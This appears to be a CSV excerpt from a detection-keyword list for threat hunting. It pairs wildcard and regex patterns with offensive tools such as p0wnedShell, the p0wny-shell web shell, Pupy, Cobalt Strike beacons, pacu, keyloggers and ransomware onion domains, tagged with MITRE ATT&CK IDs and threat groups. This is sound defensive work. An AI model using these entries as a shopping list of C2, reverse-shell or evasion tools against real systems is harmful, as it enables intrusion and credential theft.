"*p0wnedMasq.cs*",".{0,1000}p0wnedMasq\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54309"
"*p0wnedMeter.cs*",".{0,1000}p0wnedMeter\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54310"
"*p0wnedMeter.Menu*",".{0,1000}p0wnedMeter\.Menu.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54311"
"*p0wnedMov.cs*",".{0,1000}p0wnedMov\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54312"
"*p0wnedPELoader.cs*",".{0,1000}p0wnedPELoader\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54313"
"*p0wnedPotato.cs*",".{0,1000}p0wnedPotato\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54314"
"*p0wnedPowerCat.cs*",".{0,1000}p0wnedPowerCat\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54315"
"*p0wnedPPID.cs*",".{0,1000}p0wnedPPID\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54316"
"*p0wnedRawUserInterface.cs*",".{0,1000}p0wnedRawUserInterface\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54317"
"*p0wnedResources.cs*",".{0,1000}p0wnedResources\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54318"
"*p0wnedRoast.cs*",".{0,1000}p0wnedRoast\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54319"
"*p0wnedShell*",".{0,1000}p0wnedShell.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54320"
"*p0wnedShell.cs*",".{0,1000}p0wnedShell\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54321"
"*p0wnedShellx64.exe*",".{0,1000}p0wnedShellx64\.exe.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54322"
"*p0wnedShellx86.exe*",".{0,1000}p0wnedShellx86\.exe.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54323"
"*p0wnedSystem.cs*",".{0,1000}p0wnedSystem\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54324"
"*p0wny-shell*",".{0,1000}p0wny\-shell.{0,1000}","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","N/A","10","2362","659","2024-05-16T10:22:11Z","2016-11-09T20:41:01Z","54325"
"*p27dokhpz2n7nvgr.14udep.top*",".{0,1000}p27dokhpz2n7nvgr\.14udep\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54326"
"*p27dokhpz2n7nvgr.1aweql.top*",".{0,1000}p27dokhpz2n7nvgr\.1aweql\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54327"
"*p27dokhpz2n7nvgr.1axzcw.top*",".{0,1000}p27dokhpz2n7nvgr\.1axzcw\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54328"
"*p27dokhpz2n7nvgr.1hw36d.top*",".{0,1000}p27dokhpz2n7nvgr\.1hw36d\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54329"
"*p27dokhpz2n7nvgr.1jemdr.top*",".{0,1000}p27dokhpz2n7nvgr\.1jemdr\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54330"
"*p27dokhpz2n7nvgr.onion*",".{0,1000}p27dokhpz2n7nvgr\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54331"
"*p3nt4/Invoke-SocksProxy*",".{0,1000}p3nt4\/Invoke\-SocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","54332"
"*p3nt4/Nuages*",".{0,1000}p3nt4\/Nuages.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","54333"
"*p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd.onion*",".{0,1000}p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54334"
"*P8CuaPrgwBjunvZxJcgq*",".{0,1000}P8CuaPrgwBjunvZxJcgq.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","54335"
"*pac2.localhost:9999*",".{0,1000}pac2\.localhost\:9999.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","1","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","54336"
"*pack_py_payload*",".{0,1000}pack_py_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","54337"
"*package com.blackh4t*",".{0,1000}package\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","54338"
"*package externc2*",".{0,1000}package\sexternc2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","54339"
"*package kidlogger*",".{0,1000}package\skidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54340"
"*package saint.keylogger*",".{0,1000}package\ssaint\.keylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","54341"
"*package saint.webcam*",".{0,1000}package\ssaint\.webcam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","54342"
"*package_cvs_into_lse.sh*",".{0,1000}package_cvs_into_lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","54343"
"*package=impacket*",".{0,1000}package\=impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54344"
"*packer.exe *.exe *.exe*",".{0,1000}packer\.exe\s.{0,1000}\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","54348"
"*packers/invobf.py*",".{0,1000}packers\/invobf\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54349"
"*packers\invobf.py*",".{0,1000}packers\\invobf\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54350"
"*PacketSnifferClass1*",".{0,1000}PacketSnifferClass1.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54351"
"*PackMyPayload.py*",".{0,1000}PackMyPayload\.py.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","54352"
"*PackMyPayload-master*",".{0,1000}PackMyPayload\-master.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","54353"
"*pacman -S hekatomb*",".{0,1000}pacman\s\-S\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","54355"
"*pacman -S rustcat*",".{0,1000}pacman\s\-S\srustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","54356"
"*pacu --exec *",".{0,1000}pacu\s\-\-exec\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54360"
"*pacu --list-modules*",".{0,1000}pacu\s\-\-list\-modules.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54361"
"*pacu --module-args=*",".{0,1000}pacu\s\-\-module\-args\=.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54362"
"*pacu --module-info*",".{0,1000}pacu\s\-\-module\-info.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54363"
"*pacu --module-name *",".{0,1000}pacu\s\-\-module\-name\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54364"
"*pacu --session *",".{0,1000}pacu\s\-\-session\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54365"
